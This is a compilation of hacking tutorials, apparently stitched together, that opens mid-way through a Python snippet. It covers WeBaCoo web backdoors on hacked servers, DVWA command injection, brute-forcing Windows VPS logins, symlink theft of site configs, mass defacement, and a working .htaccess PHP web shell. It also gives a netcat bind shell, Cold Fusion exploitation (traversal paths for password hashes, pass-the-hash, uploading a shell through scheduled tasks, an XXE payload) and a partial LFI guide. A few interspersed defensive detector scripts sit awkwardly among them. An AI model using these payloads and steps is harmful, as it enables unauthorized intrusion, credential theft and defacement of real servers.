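    os.symlink(os.path.join(me, "public_html", "index.php"), os.path.join(sen, "local.php"))  # harmless
    return os.path.join(me, "public_html"), me


if __name__ == "__main__":
    docroot, home = build_demo()
    for key, value in audit_tree(docroot, home).items():
        print(key, value)
```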
Backdoor a Web Server with WeBaCoo
WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit that provides a terminal
connection over HTTP between the client and the web server. It is a post-exploitation tool for
maintaining access to an already compromised web server.
WeBaCoo was designed to operate under the radar of up-to-date AV, NIDS, IPS, network
firewalls and application firewalls, providing a stealthy mechanism for executing commands on
the compromised server. The obfuscated file carries its communication inside the HTTP Cookie
header, and validates the HTTP requests and responses exchanged with the web server.
WeBaCoo generates the PHP backdoor code from predefined payloads. It also offers a
"terminal" mode in which the user establishes a remote connection to the server and executes
commands with the privileges of the web service.
In many cases this tool is used when the server does not have Netcat.
INSTALLATION:
git clone git://github.com/anestisb/WeBaCoo.git
wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz
./webacoo.pl -h
COMMANDS:
1) Create an obfuscated backdoor 'backdoor.php' with the default settings:
./webacoo.pl -g -o backdoor.php
2) Create a de-obfuscated backdoor 'raw-backdoor.php' using the "transit" function:
./webacoo.pl -g -o raw-backdoor.php -f 4 -r
3) Establish a "terminal" connection to the remote host using the default settings:
./webacoo.pl -t -u http://127.0.0.1/backdoor.php
4) Establish a "terminal" connection to the remote host, configuring some arguments:
./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TTT"
5) Establish a "terminal" connection to the remote host via an HTTP proxy:
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
6) Establish a "terminal" connection to the remote host via an HTTP proxy with basic authentication:
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
7) Establish a "terminal" connection to the remote host via Tor and log the activity:
./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt
Now, having installed the tool and learned the commands, we will create the backdoor to get a
console connection to the web server.
For this case I obtained a (hacked) server where I'll upload the backdoor that I create with the
following command:
./webacoo.pl -g -o backdoor.php
The backdoor.php is created and placed in the WeBaCoo folder; then upload the file to the
(hacked) server and connect to it with the following command:
./webacoo.pl -t -u http://www.sitio-web.com/backdoor.php
The connection to the server is established, and it is very fast.
Simple commands:
In this case type "load" to see the modules that handle the whole server, which are:
1) MySQL-CLI: MySQL command line module:
mysql-cli (ex. 'mysql-cli 10.0.1.11 admin pass')
2) PSQL-CLI: Postgres command line module:
psql-cli (ex. 'psql-cli 10.0.1.12 root pass testdb')
3) Upload: file upload module:
upload (ex. 'upload exploit.c /tmp/')
4) Download: file download module:
download (ex. 'download config.php')
5) Stealth: stealth enhance module:
stealth (ex. 'stealth /var/www/html')
These commands are easy to use; here is a brief demonstration of the MySQL-CLI command to
connect to the database server.
1) Download the configuration file:
download configuration.php
2) Open the configuration.php file, copy the MySQL user and password, and type the command:
mysql-cli 127.0.0.1:3306 db_user db_password
3) The tool connects to MySQL; now just type show databases; to see all the databases.
The other commands are used the same way, to upload a local root exploit or download any file
from the server.
With this tool you no longer need Netcat on the web server, or a back-connection with Netcat,
which often fails when connecting to a web server.
Web Server Hacking through Command Injection
Hello, folks! Do you know that command injection is one of the most dangerous web
vulnerabilities? It is a little harder to find. Command injection is also called command
execution, code injection, or remote code execution. Well, it's my first post on command
injection, so I'll start with a basic and simple tutorial; maybe I'll post some advanced techniques
in future, depending on my learning. Command execution is my favorite vulnerability :)
What is Command Injection:
Command injection is one of the most dangerous web vulnerabilities. It occurs when an attacker
sends unauthorized commands to the web server and the server accepts them without proper
validation of the client input. The vulnerable application is wired to the server's operating
system shell and has no filter or whitelist to block unwanted commands, which allows the
attacker to run arbitrary commands on the web server's operating system.
One simple example of command injection: assume that your computer is the web server. As
you know, every web host needs an operating system, such as Linux, Windows or Unix, and
every website has its own server and operating system connected to the World Wide Web. Every
OS has a terminal, like the Command Prompt in Windows. Now assume that you create a web
application that lets any user ping an IP address. To do that you have to connect the terminal or
command prompt to the web application (only the OS terminal can ping the requested IP), and
without any filtering or validation of user input your application blindly trusts the client's request
and executes it in the web server's OS terminal. So what if an attacker determines that your
application is vulnerable to command injection and sends unauthorized commands to the server
terminal? He can gain complete access to your web server. It's like handing your OS terminal to
an attacker, and of course whoever controls the OS terminal can do anything on the web server:
shell upload, website defacement, database takeover, creating further vulnerabilities, and so on.
Understanding Complete Command Injection :
Fine, if you still don't understand what command injection is and how it works, here is a simple
tutorial for you. Just follow the steps below and learn command execution in a day.
Requirements :
DVWA Pen-testing lab or OWASP BWA - (DVWA)
Basic knowledge of Windows CMD and Linux Terminal
Little Networking Knowledge
Burp Suite (Not Recommended)
Brain!
Simple Command Execution tutorial for Beginners :
I'm going to show a simple command execution tutorial using the OWASP BWA (DVWA)
pentest lab that runs in a virtual machine. We'll execute our command on the server and be able
to take down the complete website.
As you know, DVWA is already vulnerable to command execution (it is made for pentesting), so
we don't need to find the flaw; we go straight to determining the OS and executing commands.
In the image below you can see that Burp Suite found the server information:
Or you can also use Nmap for more information:
If you have a little networking knowledge you can easily understand what it is and how things
work.
To become an expert in command execution you have to learn the Linux, Python, Perl, C and
DOS programming languages, not completely, but you must know about 40% to 50%. So, back
to the injection attack.
Open the DVWA Command Injection vulnerability page. As I said, the DVWA web app allows
anyone to ping an IP and is connected to the command prompt (check the source code to see
how the web app works).
Try to understand exactly how it works and what we have to do to hack the web server. As you
know, the complete server can be compromised via the command prompt or terminal. Normally
we use this command to ping an IP from the Windows command prompt: "ping WEBSITE YOU
WANT TO PING"
The DVWA web application does the same thing, which means we are effectively on the
command prompt, and as you saw in the source code it has no filter for user input that would
protect the server from command injection attacks.
Now give DVWA a try with one IP request to see how it works.
I pinged 127.0.0.1 to see how it works, and it simply works. Now we can use some evil mind to
compromise the web server with command injection. Check the vulnerability with the "& ls"
command; in general we use "ls" to get the list of files and folders in the current directory.
Now any noob can understand that we got complete access to the web server's command
prompt, so an attacker can easily compromise the whole server. Let's try this command:
"& cd ../../../../../../../../WINDOWS/system32 & dir". You'll get a huge page with the complete
directory listing of files and folders; you can also search for cmd.exe.
Now, how to hack the complete web server, get the database and all the files, and even gain
root access? We just need to upload our backdoor. There is a separate post on how to upload
the C99 PHP shell backdoor and hack the website using command execution.
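The DVWA ping handler described above, written here as an added example (not DVWA's own code) in its vulnerable and hardened forms, with a check that flags the "& ls" and "& cd ... & dir" inputs the tutorial uses; the ping command and its arguments are assumptions:

```python
"""Constructed example (not from the original post): the DVWA-style "ping an IP"
handler in its vulnerable and hardened forms, plus a check that flags the inputs
the tutorial uses ("& ls", "& cd ../../WINDOWS/system32 & dir")."""
import ipaddress
import re
import subprocess
from typing import List

# Characters that let one argument become a second shell command.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r]")


def build_ping_vulnerable(target: str) -> str:
    """The vulnerable pattern: concatenate user input into one shell string.
    Returned for inspection only; this example never executes it."""
    return "ping -c 1 " + target


def looks_injected(target: str) -> bool:
    """Detection view: does the value carry shell metacharacters?"""
    return SHELL_META.search(target) is not None


def is_safe_ping_target(target: str) -> bool:
    """Allow-list check: the value must parse as a bare IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(target.strip())
    except ValueError:
        return False
    return True


def build_ping_hardened(target: str) -> List[str]:
    """Hardened pattern: validate first, then build argv as a list so no shell
    is involved at all. Raises ValueError for anything but an IP address."""
    if not is_safe_ping_target(target):
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", "1", target.strip()]


def run_ping(target: str, timeout: float = 5.0) -> int:
    """Execute the hardened command (shell=False) and return its exit status."""
    return subprocess.run(build_ping_hardened(target), capture_output=True,
                          timeout=timeout, check=False).returncode


if __name__ == "__main__":
    for payload in ("127.0.0.1", "127.0.0.1 & ls",
                    "127.0.0.1 & cd ../../../../../../../../WINDOWS/system32 & dir"):
        print(f"{payload!r}: shell string {build_ping_vulnerable(payload)!r}, "
              f"injected={looks_injected(payload)}, accepted={is_safe_ping_target(payload)}")
```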
Thank you for reading our post. Stay tuned with us, please share it to help us grow, and always
feel free to comment and let me know your problems.
How To Hack Windows Servers Using DuBrute 2.2
Hello,
Today I'm sharing how to hack many, many Windows VPS.
All you need is two pieces of software, DuBrute and Vnc_scanner, to hack a VPS.
Download links:
Vnc_scanner: Here
DuBrute: Here
How to use?
1) Download both files from the links above.
2) Extract both files anywhere on your PC.
3) Open the Vnc_scanner folder.
4) Open the exe file called vnc_scanner_gui.exe.
5) Select any country.
6) Click on Get Dial List.
After the whole IP list has come in:
7) Click on Start Scan.
It will then scan for working VPS IPs.
After the scan has finished, click on Start parser. It will save the good IPs in a new text file called IPs.txt.
Now you need to get the usernames and passwords for the scanned IPs. For that you have to use
the hacking software called DuBrute.
1) Open the DuBrute folder.
2) Copy the IPs.txt file from the vnc_scanner folder and paste it into the DuBrute folder.
3) Open DUBrute.exe.
4) Click on Generation.
5) Check the image below.
1st, click on File IP, then select the text file called IPs.txt and click Open.
2nd, select File Login and click Open, then File Pass and click Open.
3rd, click on Make and press OK.
Then click on Exit.
Now press Start in DuBrute.
Let it brute-force the combinations. When a working VPS is found whose IP, username and
password match, it is saved in the DuBrute folder in a file called goog.txt.
Like this:
This image shows that I found 3 working VPS.
Note: Both files contain a virus; your anti-virus will detect them as a Trojan etc. So when you
download them, if your anti-virus is active it will delete the files. If you want to use them you
have to turn off your anti-virus, or you can hack VPS from a VPS like me. I downloaded these
files on a VPS and hacked from it ;P. I have used these tools to hack VPS for the last 1-2 weeks
and hacked around 100 working VPS.
This is a detailed tutorial on how to hack VPS. Should you have more doubts about this, feel free
to reply here; I am here to help you.
Thanks, and good luck to all in hacking many, many VPS.
How to use a VPS
Go to Start > Run, type mstsc and press OK.
Then put in your VPS IP and connect. Then type your ID and password, then OK.
That's it, you are in the Virtual Private Server.
How to change the VPS password?
Press Ctrl + Alt + End and you will see the option to change the password.
Note: You can only change the password if you have permission from the Administrator.
Respect!
Symlink Tutorial for Beginners
What do you mean by symbolic links?
In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a
reference to another file or directory in the form of an absolute or relative path and that affects
pathname resolution.
How to do a symlink on a web server?
For symlinking you need shell access (GNY, C99, r57 etc.) on the website. It looks like this:
Now you need to create one directory with any name, like sym, test etc.
After creating the directory you need two files:
1. A blank .txt file in zip format.
2. .htaccess
The txt file contains just "/"; save it.
The .htaccess file contains the code below:
Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .php
AddHandler txt .php
and save it as ".htaccess".
Now upload both files, the zip and the .htaccess. After uploading both files we need to unzip the
file using this command:
"unzip "file name" "
After unzipping you will see a txt file there. Now you need to open the appropriate path in the
web browser.
It looks like this:
Now just click on the 1.txt file that you unzipped. After clicking on 1.txt it lists all directories of
the web server; check out the image below:
OK, done. Now in the symlink we will check the directory path, like
1. /home/"Website Username"/public_html/
2. /hsphere/local/home/c283273/
There are different paths; you just need to check them out.
If you click on "Home" you will get a 403 Forbidden error, but never mind; after you get this
error you need to add the "Website Username".
To find the web users you need to execute this command:
cat /etc/passwd
The path is "/home/"website username"/public_html/".
After executing the cat command it looks like the image above.
Now just find a specific target that has an admin login page and a config file.
How do you find this specific target site?
You need the server IP and www.bing.com.
To find Joomla, WordPress and PHP sites we can use these dorks:
1. ip:123.x.x.x index.php?option=
2. ip:123.x.x.x "Powered By WordPress"
3. ip:123.x.x.x .php?id=
and more...
Having found the target site, you now need to find the config file. In Joomla the config file is
named "configuration.php", in WordPress "wp-config.php", etc.
You cannot see the file directly like this:
www.Target.com/wp-config.php
www.Target.com/configuration.php
But when we symlink the specific target we can view the config file using right click and view
source.
It looks like the image above.
This config file includes the site's database information, like database name, username,
password etc. After getting this you can log into the site's database and edit or delete specific
columns, fields etc.
But we need to change the admin password. In many cases the password is in MD5, base64 or
another encoded form. You need to decrypt it... that's it.
After changing the password you know what to do...!!!
MASS DEFACE TUTORIAL
Today I will tell you how to mass deface in a few steps, so let's start.
Things Required:
 Rooted server (check the "how to root a Linux server" tutorial: Here)
 Mass deface script (download from Here, password: www.hax0rtools.com)
Step By Step Guide:
 First we have to download our mass deface file, so as usual we will use wget.
Type: wget www.somesite.in/massdeface.zip
 As we have downloaded it as a zip file, we will now unzip it by typing
Type: unzip massdeface.zip
 Once you have unzipped it, we will run the script by typing
Type: perl massdeface.pl
 After we have run the script it will show its usage [ perl mass.pl /tmp/index.html ], so we
have to run it according to that, but before we do so we have to download our deface page
using wget.
Type: wget http://www.somesite.com/index.html
Once we have downloaded our deface page, we run the final command to mass deface.
Type: perl massdeface.pl /tmp/index.html
ATTACKING WEB SERVERS VIA .HTACCESS
A while back I was testing a CMS that had a curious feature: all uploaded files were
placed in their own directory. This was not a security enhancement, as the
application allowed PHP files to be uploaded. However, I couldn't help asking: what if
PHP uploads had been restricted? The answer was .htaccess files. Using SetHandler
in a .htaccess file is well known, but does not lead to remote code execution. So
after some thinking I put together some self-contained .htaccess web shells. I wrote
both a PHP and a server-side-include shell, but other options can easily be added
(JSP, mod_perl, etc.).
This works by first overriding the default Apache access restriction on .htaccess from
within the .htaccess file itself, so we can access it as a URL. Next we reconfigure the
.htaccess extension to be treated as a dynamic content script, and finally we have
our payload. The attack works because the parsing and processing of the Apache
configuration directives in .htaccess occur before the .htaccess file is processed as a web
request. There is one relatively small gotcha: the payload has to be commented out
with a # at the start so it doesn't get interpreted by Apache, and likewise the script
interpreter must ignore the Apache directives. PHP lends itself well to this, as any
content not within the <?php ?> tags is presented as is.
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
Order allow,deny
Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occurs after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
Simply upload the preferred shell as a .htaccess file and then visit it via the URL
http://domain/path/.htaccess?c=command for remote code execution.
The collection of attack files is accessible from my github htshells repository.
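Both the symlink tutorial's .htaccess and the self-contained .htaccess shell above work by dropping Apache directives into an upload directory. The following is an added example (not part of the htshells project or either tutorial) of a reviewer that scans such a file for exactly those directives; the sample files and the "benign" policy are constructed for the demonstration.

```python
"""Constructed example (not part of the htshells project or either tutorial):
a reviewer for .htaccess files found in upload directories. It flags the
directives the symlink tutorial and the .htaccess web shell above rely on:
re-exposing .ht* files, handler remaps, Options Indexes/FollowSymLinks and
script markup embedded in the config file."""
import re
from typing import List, Tuple

PAYLOAD = re.compile(r"<\?php|<\?=|<!--#(?:exec|include)", re.IGNORECASE)
FILES_HT = re.compile(r"<Files(?:Match)?\b[^>]*\.ht", re.IGNORECASE)
HANDLER = re.compile(r"^(AddType|AddHandler|SetHandler)\s+(.*)$", re.IGNORECASE)
SCRIPT_TYPES = re.compile(r"x-httpd-php|php\d*-script|cgi-script|server-parsed", re.IGNORECASE)
OPTIONS = re.compile(r"^Options\b(.*)$", re.IGNORECASE)
RISKY_OPTION = re.compile(r"(?<!-)\b(Indexes|FollowSymLinks|ExecCGI|Includes)\b", re.IGNORECASE)


def review_htaccess(text: str) -> List[Tuple[int, str]]:
    """Return (line number, reason) for every suspicious line."""
    findings: List[Tuple[int, str]] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        # Check the raw line first: the web-shell payload hides behind a '#'.
        if PAYLOAD.search(raw):
            findings.append((lineno, "script markup embedded in config file"))
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if FILES_HT.search(line):
            findings.append((lineno, "overrides the default deny on .ht* files"))
        m = HANDLER.match(line)
        if m:
            directive, args = m.group(1), m.group(2)
            if SCRIPT_TYPES.search(args):
                findings.append((lineno, f"{directive} maps an extension to a script handler"))
            elif re.search(r"\.php\b", args, re.IGNORECASE):
                findings.append((lineno, f"{directive} remaps the .php extension"))
        m = OPTIONS.match(line)
        if m:
            for opt in RISKY_OPTION.finditer(m.group(1)):
                findings.append((lineno, f"Options enables {opt.group(1)}"))
    return findings


# Sample 1: the .htaccess from the symlink tutorial.
SYMLINK_HTACCESS = "Options Indexes FollowSymLinks\nDirectoryIndex test.htm\nAddType txt .php\nAddHandler txt .php\n"

# Sample 2: the shape of the self-contained .htaccess shell, payload replaced by a comment.
HTSHELL_HTACCESS = (
    "# Override default deny rule to make .htaccess file accessible over web\n"
    '<Files ~ "^.ht">\n'
    "Order allow,deny\n"
    "Allow from all\n"
    "</Files>\n"
    "AddType application/x-httpd-php .htaccess\n"
    "###### SHELL ###### <?php /* payload would go here */ ?> ###### LLEHS ######\n"
)

# Sample 3 (constructed): what an upload directory's .htaccess should look like instead.
BENIGN_HTACCESS = "Options -Indexes -FollowSymLinks\nphp_flag engine off\nRemoveHandler .php .phtml\n"

if __name__ == "__main__":
    for name, text in (("symlink", SYMLINK_HTACCESS), ("htshell", HTSHELL_HTACCESS),
                       ("benign", BENIGN_HTACCESS)):
        print(name, review_htaccess(text))
```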
How to Backconnect with Netcat
1. You need to download these:
netcat for Windows: http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with the shell: http://www.multiupload.nl/TOBD6TAOXE
2. Upload nc with the shell.
3. Set chmod 777 for nc:
Quote:
chmod 777 nc
4. Run the command ./nc -vv -l -p [port] -e /bin/bash in the shell:
Quote:
./nc -vv -l -p 4499 -e /bin/bash
5. Open cmd, change to the directory where nc is saved (e.g. cd c:\) and run the command
nc -vv [ip target] [port]:
Quote:
C:\>nc -vv ip server 4499
6. Now you have a back connection.
Hacking Cold Fusion Servers - Part I
Today I will go over part I of a few tricks we can use to attack Cold Fusion servers of
various versions using a few published methods. Cold Fusion is an Adobe product
targeted at enterprise and small business owners. It is probably most commonly known
for and associated with CFML, or Cold Fusion Markup Language, and most visually
associated with .cfm files on web servers. CF platforms are built on a Java core and as
such also have some built-in features which allow command execution and database
interaction. The following should present you with a few methods you can use to check
for common vulnerabilities on these platforms, as well as how to exploit them. Most of
these were published ages ago in 2010, but there are still many sites which are either
running versions which are un-patchable or simply running unpatched software still....
I will start this series off with the most common vulnerability first, which is the known
Local File Disclosure, or LFI, in the 'locale' parameter (also referenced under
CVE-2010-2861). The LFI vulnerability allows us to read files off the target system
without any authentication. The neat thing that makes this one different from most LFD
is that if we play our cards right we can use this vulnerability as a foothold to further
penetrate our target; read on and see. We first try to find the admin page, as it is the
most commonly vulnerable page, but certainly not the only one. You can typically find it
at one of the following locations:
/CFIDE/administrator/index.cfm
/CFIDE/administrator/enter.cfm
/CFIDE/componentutils/index.cfm
/CFIDE/componentutils/login.cfm
You can determine the version of the CF server by simply viewing the login page in most
cases, as the image usually contains the version graphically, like so:
Knowing the version is important, as it helps us determine the appropriate path to use
to try and turn this LFD into something useful. Now if you know the full path to the CF
'.properties' file then you're in business, as it contains the CF admin password hashes.
The list of possible paths worth trying is as follows:
v6: locale=../../../../../../../../CFusionMX/lib/password.properties%00en
v7a: locale=../../../../../../../../CFusionMX7/lib/password.properties%00en
v7b: locale=../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en
v8: locale=../../../../../../../../ColdFusion8/lib/password.properties%00en
vJRun: locale=../../../../../../../../../../JRun4/servers/cfusion/cfusion-ear/cfusion-war/WEB-INF/cfusion/lib/password.properties%00en
If you have a successful injection for one of the above files, you will see the password
hash(es) show up on the page you're injecting into. It will look a bit like this:
NOTE: In versions 6 & 7 encryption is not enabled by default, although I have never
seen a server which did not encrypt the password in hash form.
Now you can crack the password hash and log in with the clear-text password, or we
can use a little trick to bypass the authentication requirements with a pass-the-hash
technique. The login form uses a bit of JavaScript magic to create an HMAC hash from
the admin password hash and a salt value which is changed every 30 seconds. You can
find this salt value by simply viewing the source code of the login page; look at the
second occurrence of the term 'salt', or review the form input details. Because of this,
we pass the hash, generate the HMAC hash on our own and submit it, simulating a
successful login! You need to grab the salt from the source:
OK, so you now have the password hash and salt in hand....
Here is some code I whipped up to accomplish this task of logging in real quick, for you
to get the authenticated cookie.
Quickly enter the needed details and run it. If successful, you will have the
authenticated cookie presented to you in the terminal, like so:
Now once you have the authenticated cookie, you're pretty much in. You can use your
favorite cookie editor to load up the new
'CFAUTHORIZATION_cfadmin=<SOMEVALUEHEREONSUCCESS>' cookie. Once loaded,
you simply refresh your browser and you're now logged into the administrative panel
for Cold Fusion. Now to try and get a shell up on the server....
If you already know the server path to the web-facing directory then you can move
forward; if not, you can check the 'Mappings' link on the left under 'Server Settings'.
This will show a mapping of all paths for CF; by default the /CFIDE dir should be
mapped, giving us a usable path in the majority of cases. The Mappings page looks like
this:
Once the path is known we move to the 'Scheduled Tasks' page located under
'Debugging & Logging' in the left menu links.
Now you simply point the task scheduler at your remote CFM/JSP shell hosted on a
server you control, stored in txt format like an RFI attack payload. You can schedule it
as a one-time event; it defaults to the current time, so no need to calculate things if
you're in a different time zone :) If you need a username/password to access the remote
shell file source then provide them as needed in the appropriate fields of the task
scheduler. The next step is key: set the 'Publish' option to true so it saves the results
to a file (i.e. grabs our remote shell source and saves it to an executable file). You then
provide it with the full path to where you want to write to. In the majority of cases
/CFIDE is writable; otherwise poke around or generate errors in SQL queries on the site
to get the path (standard Full Path Disclosure rules still apply here). When your form is
all set up you can submit it to create the scheduled task.
You will need to click on the green check-mark icon to run the scheduled task, which
actually executes it and grabs our shell. If it has problems with the remote file you will
likely get a warning message of some kind in the admin panel; edit and retry. Upon
success, you can point your browser at the path you uploaded your shell to. In most
cases Cold Fusion is running on a Windows system with full NT AUTHORITY\SYSTEM
privileges, which means you pretty much own the local box now :)
If you find that 'cfexecute' is disabled and blocking your CFM shell from working
properly, you can simply re-enable it from the admin panel since you already have
access :)
NOTE: JSP is only supported on Enterprise versions of ColdFusion. You can actually
determine Enterprise vs Standard by requesting a non-existent .jsp file and judging
how the server responds!
You have now successfully shelled a Cold Fusion server at this point and in most cases
have admin privileges to do what you want (create a new user, add it to the admin
group, add/enable RDP, enjoy new RDP). In the rare *nix instances you're likely
running as nobody or another non-elevated user, so the usual post-exploit game plan
still applies if you want to take over the whole server (i.e. root the box). Hope you
enjoyed this first part of the series; the second part will follow shortly....
Hacking Cold Fusion Servers - Part II
Now I will go over two more vulnerabilities which can potentially be leveraged to attack
Cold Fusion servers. This time we will be looking at exploiting a weak uploader as well
as another LFD/LFI vulnerability, but with a small twist. If you didn't catch the first part
then I encourage you to read that thread before reading this one, as it makes for a
better attack flow in general. Assuming you're all set, let's begin....
One thing to be aware of is that Cold Fusion packed an FCKeditor in with v8 when it was
first released, and they didn't do proper checking on the upload types. If you give it a
file as .txt but write to .cfm or .jsp, it thinks this is OK! This exploit will take some
coding ability on your behalf, or the ability to use Metasploit, as it has a nice pre-built
exploit for this one (the Java Meterpreter works best as payload). You basically point
and shoot with MSF and hope for the best. If the uploader is present it will try to send a
multi-part upload request via POST. If successful you should be able to find a shell in
the '/userfiles/file/' directory of the site. Now I have coded my own script for this and
tried with Metasploit, but I have not successfully exploited this myself, so I'm not going
to post my code just yet; I would like to confirm it first. You have MSF as a crutch for
now; you can find the module by referencing CVE-2009-2265, or just type
'use exploit/windows/http/coldfusion_fckeditor'. I will update this section when I have
confirmation of working code on my part.....
OK, so in addition to the LFD/LFI to RCE vulnerability we demonstrated in part I of this
series, there is another LFD/LFI vulnerability. This time it is XML External Entity (XXE)
injection in the Data Services, which allows a wide range of XML-based attacks,
including local file disclosure, TCP scans and denial of service conditions, which can be
achieved by recursive entity injection, attribute blow-up and other types of injection.
For more information about the implications of this vulnerability, refer to RFC 2518
(17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt. I will
show you how we can exploit this to map out the target server and read files. Basically
we send a carefully crafted XML request to the Data Service file handler, and if it is
vulnerable to XXE injection it will spit back the results we ask for. Here are some
common files to check:
/flex2gateway/
/flex2gateway/http
/flex2gateway/httpsecure
/flex2gateway/cfamfpolling
/flex2gateway/amf
/flex2gateway/amfpolling
/messagebroker/http
/messagebroker/httpsecure
/blazeds/messagebroker/http
/blazeds/messagebroker/httpsecure
/samples/messagebroker/http
/samples/messagebroker/httpsecure
/lcds/messagebroker/http
/lcds/messagebroker/httpsecure
/lcds-samples/messagebroker/http
/lcds-samples/messagebroker/httpsecure
You can accomplish this easily enough with the Hackbar add-on in Firefox; Burp or
Netcat is just as easy. Essentially we can use the XML code below as a framework for
our file injection and enumeration; simply pass it as POST data to the vulnerable Data
Service:
Code:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "<INSERT_PATH/FILE_HERE>"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits>
<object><traits /></object><null /><string /><string />
<object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object>
<string>&x3;</string><int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
Simply replace '<INSERT_PATH/FILE_HERE>' with the path to read and let the requests
rip, like so:
Now the cool thing here is that it works regardless of OS, since it is due to how the Data
Services handle and parse the XML data being passed; just make sure you request the
proper file type for the designated system type (check the server response if you have
no idea)...
Also, in addition to reading files, you can simply pass a directory and it will spit back the
directory content, making it very easy to map things out and find files worth reading.
Limited privileges may restrict some file reading, but there is still plenty to cause
trouble, enumerate lots of info, and possibly even read the site configuration details...
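From the defender's side, both Cold Fusion issues in this series leave distinctive traces: the 'locale' parameter from Part I carrying traversal or a null byte towards password.properties, and an AMFX body on the Data Services paths declaring an external entity. The following is an added example (not from either post) that flags both in request records; the record format and the sample traffic are constructed for the demonstration.

```python
"""Constructed example (not from the original posts): scan request records for
the two ColdFusion attacks described above, a 'locale' parameter pointing at
password.properties (CVE-2010-2861) and an XML body that declares an external
entity against the Data Services endpoints. The path lists come from the posts."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

ADMIN_PATHS = ("/CFIDE/administrator/", "/CFIDE/componentutils/")
DATA_SERVICE_PATHS = ("/flex2gateway", "/messagebroker", "/blazeds/messagebroker",
                      "/samples/messagebroker", "/lcds")

LOCALE_PARAM = re.compile(r"[?&]locale=([^&#\s]*)", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\.[/\\]")
EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def locale_finding(path: str) -> Optional[str]:
    """Flag a 'locale' value on a CF admin path that leaves the locale-name space:
    directory traversal, an embedded null byte, or a reference to the password store."""
    if not path.upper().startswith(tuple(p.upper() for p in ADMIN_PATHS)):
        return None
    m = LOCALE_PARAM.search(path)
    if not m:
        return None
    value = unquote(m.group(1))  # %00 becomes a real NUL after decoding
    if TRAVERSAL.search(value) or "\x00" in value or "password.properties" in value.lower():
        return f"locale LFD attempt: {value!r}"
    return None


def xxe_finding(path: str, body: str) -> Optional[str]:
    """Flag an external entity declaration posted to a Data Services endpoint."""
    if not path.lower().startswith(tuple(p.lower() for p in DATA_SERVICE_PATHS)):
        return None
    if EXTERNAL_ENTITY.search(body):
        return "XXE attempt: external entity declared in AMFX body"
    return None


def scan_requests(requests: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (index, reason) for every request that matches one of the checks."""
    findings: List[Tuple[int, str]] = []
    for i, req in enumerate(requests):
        for reason in (locale_finding(req["path"]),
                       xxe_finding(req["path"], req.get("body", ""))):
            if reason:
                findings.append((i, reason))
    return findings


# Constructed sample traffic (no real hosts); the DOCTYPE mirrors the page's payload shape.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/CFIDE/administrator/enter.cfm?locale=en"},
    {"method": "GET",
     "path": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../../ColdFusion8/lib/password.properties%00en"},
    {"method": "POST", "path": "/flex2gateway/http",
     "body": '<?xml version="1.0"?><!DOCTYPE test [ <!ENTITY x3 SYSTEM "file:///etc/passwd"> ]>'
             '<amfx ver="3"><body><string>&x3;</string></body></amfx>'},
    {"method": "POST", "path": "/flex2gateway/http",
     "body": '<amfx ver="3"><body><object><traits /></object></body></amfx>'},
]

if __name__ == "__main__":
    for idx, reason in scan_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: {reason}")
```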
In addition to the named exploits in this Cold Fusion series, the same old usual suspects
are still fair game here. SQL injection vulnerabilities are just as common as on PHP or
ASP based sites, and 'cfinclude' can enable source disclosure. In many cases the DB can
be compromised and Java commands may be leveraged to further extend the potential
attack vectors and escalation platform beyond that of a standard injection, so keep your
eyes out and don't be afraid to take on a new site just because it has .CFM or .JSP files
instead of the oh-so-popular .PHP or .ASP. Hope you enjoyed this short series on
hacking Cold Fusion servers. All material for the series was available on the net in
various places; all I did was wrap it up for you and try to make it a little easier to
understand. If you have any questions or suggestions please post them here or let me
know via PM.
LFI exploitation via php://input [Shelling Sites]
Hey guys,
Today I'll be explaining how to shell a website using the "php://input" method via LFI.
So let's get started.
Now let's have our target, shall we. As an example, your target URL should look like this:
Code:
http://www.site.com/index.php?page=
You can have anything similar to that, as long as you are able to read files and obtain an "include"
error.
First things first, give it a shot and see if you can read "/etc/passwd".
The URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd
If successful, you'll get a page that looks like this:
Now let's try reading:
Code:
/proc/self/environ
/proc/self/fd
So the URL will become:
Code:
http://www.site.com/index.php?page=/proc/self/environ
http://www.site.com/index.php?page=/proc/self/fd
Hmm, it seems like nothing is being displayed, even though I've added a null byte at the end of the URL.
Well, not to worry, it's time to use our backup method. The "php://input" method will help us read files
